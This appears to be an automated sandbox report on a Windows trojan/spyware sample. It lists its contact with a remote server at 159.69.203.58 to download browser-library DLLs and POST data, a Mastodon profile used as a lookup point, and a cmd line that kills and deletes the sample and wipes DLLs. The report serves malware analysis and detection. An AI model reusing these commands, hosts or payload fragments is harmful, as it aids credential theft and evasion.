df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 25 Sep 2021 08:15:04 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Sun, 26 Sep 2021 08:15:04 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 25 Sep 2021 08:15:04 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Sun, 26 Sep 2021 08:15:04 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58
Source: unknown	TCP traffic detected without corresponding DNS query: 159.69.203.58

Source: 0lm81UZm7Y.exe, 00000001.00000002.278517897.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: http://159.69.203.58/
Source: 0lm81UZm7Y.exe, 00000001.00000002.278517897.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: http://159.69.203.58/1008
Source: 0lm81UZm7Y.exe, 00000001.00000002.278517897.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: http://159.69.203.58/freebl3.dll
Source: 0lm81UZm7Y.exe, 00000001.00000002.278517897.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: http://159.69.203.58/mozglue.dll
Source: 0lm81UZm7Y.exe, 00000001.00000002.278517897.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: http://159.69.203.58/nss3.dll
Source: nss3[1].dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nss3[1].dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: 0lm81UZm7Y.exe, 00000001.00000002.278517897.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nss3[1].dll.1.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nss3[1].dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: nss3[1].dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: nss3[1].dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: nss3[1].dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nss3[1].dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: nss3[1].dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: nss3[1].dll.1.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: nss3[1].dll.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: nss3[1].dll.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: nss3[1].dll.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue[1].dll.1.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: nss3[1].dll.1.dr	String found in binary or memory: http://www.mozilla.com0
Source: temp.1.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: temp.1.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: temp.1.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: temp.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: temp.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtabSQLite
Source: temp.1.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 0lm81UZm7Y.exe, 00000001.00000003.253606394.0000000002F14000.00000004.00000001.sdmp	String found in binary or memory: https://mas.to
Source: 0lm81UZm7Y.exe, 00000001.00000003.253606394.0000000002F14000.00000004.00000001.sdmp	String found in binary or memory: https://mas.to/
Source: 0lm81UZm7Y.exe, 00000001.00000003.253606394.0000000002F14000.00000004.00000001.sdmp	String found in binary or memory: https://mas.to/.well-known/webfinger?resource=acct%3Akillern0%40mas.to
Source: 0lm81UZm7Y.exe, 00000001.00000003.253606394.0000000002F14000.00000004.00000001.sdmp	String found in binary or memory: https://mas.to/users/killern0
Source: 0lm81UZm7Y.exe, 00000001.00000003.253606394.0000000002F14000.00000004.00000001.sdmp	String found in binary or memory: https://mas.to;
Source: 0lm81UZm7Y.exe, 00000001.00000003.253606394.0000000002F14000.00000004.00000001.sdmp	String found in binary or memory: https://media.mas.to
Source: temp.1.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: temp.1.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: nss3[1].dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: temp.1.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST /1008 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 159.69.203.58Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--

Source: unknown

DNS traffic detected: queries for: mas.to

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Code function: 1_2_00410340 DeleteUrlCacheEntry,DeleteUrlCacheEntry,DeleteUrlCacheEntry,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

1_2_00410340

Source: global traffic	HTTP traffic detected: GET /@killern0 HTTP/1.1Host: mas.to
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 159.69.203.58Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 159.69.203.58Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 159.69.203.58Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 159.69.203.58Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 159.69.203.58Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 159.69.203.58Connection: Keep-Alive

Source: unknown

HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.5:49743 version: TLS 1.2

Source: 0lm81UZm7Y.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_00413270	1_2_00413270
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_0041E780	1_2_0041E780
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_00498990	1_2_00498990
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_0041DBF0	1_2_0041DBF0
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_00439000	1_2_00439000
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_004AD033	1_2_004AD033
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_004690E0	1_2_004690E0
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_0049D0F0	1_2_0049D0F0
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_00421200	1_2_00421200
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_004982C0	1_2_004982C0
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_004B22EF	1_2_004B22EF
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_00450340	1_2_00450340
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_00421360	1_2_00421360

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: String function: 00401020 appears 53 times
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: String function: 0049CF02 appears 31 times

Source: 0lm81UZm7Y.exe, 00000001.00000003.257555484.00000000031EA000.00000004.00000001.sdmp

Binary or memory string: OriginalFilenamemsvcp140.dll^ vs 0lm81UZm7Y.exe

Source: 0lm81UZm7Y.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 0lm81UZm7Y.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 0lm81UZm7Y.exe

Virustotal: Detection: 33%

Source: 0lm81UZm7Y.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\0lm81UZm7Y.exe 'C:\Users\user\Desktop\0lm81UZm7Y.exe'
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im 0lm81UZm7Y.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\0lm81UZm7Y.exe' & del C:\ProgramData\*.dll & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im 0lm81UZm7Y.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im 0lm81UZm7Y.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\0lm81UZm7Y.exe' & del C:\ProgramData\*.dll & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im 0lm81UZm7Y.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6	Jump to behavior

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "0lm81UZm7Y.exe")

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\freebl3[1].dll

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/18@1/2

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: 0lm81UZm7Y.exe, 00000001.00000003.247214194.00000000022C0000.00000004.00000001.sdmp, nss3[1].dll.1.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: nss3[1].dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: 0lm81UZm7Y.exe	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
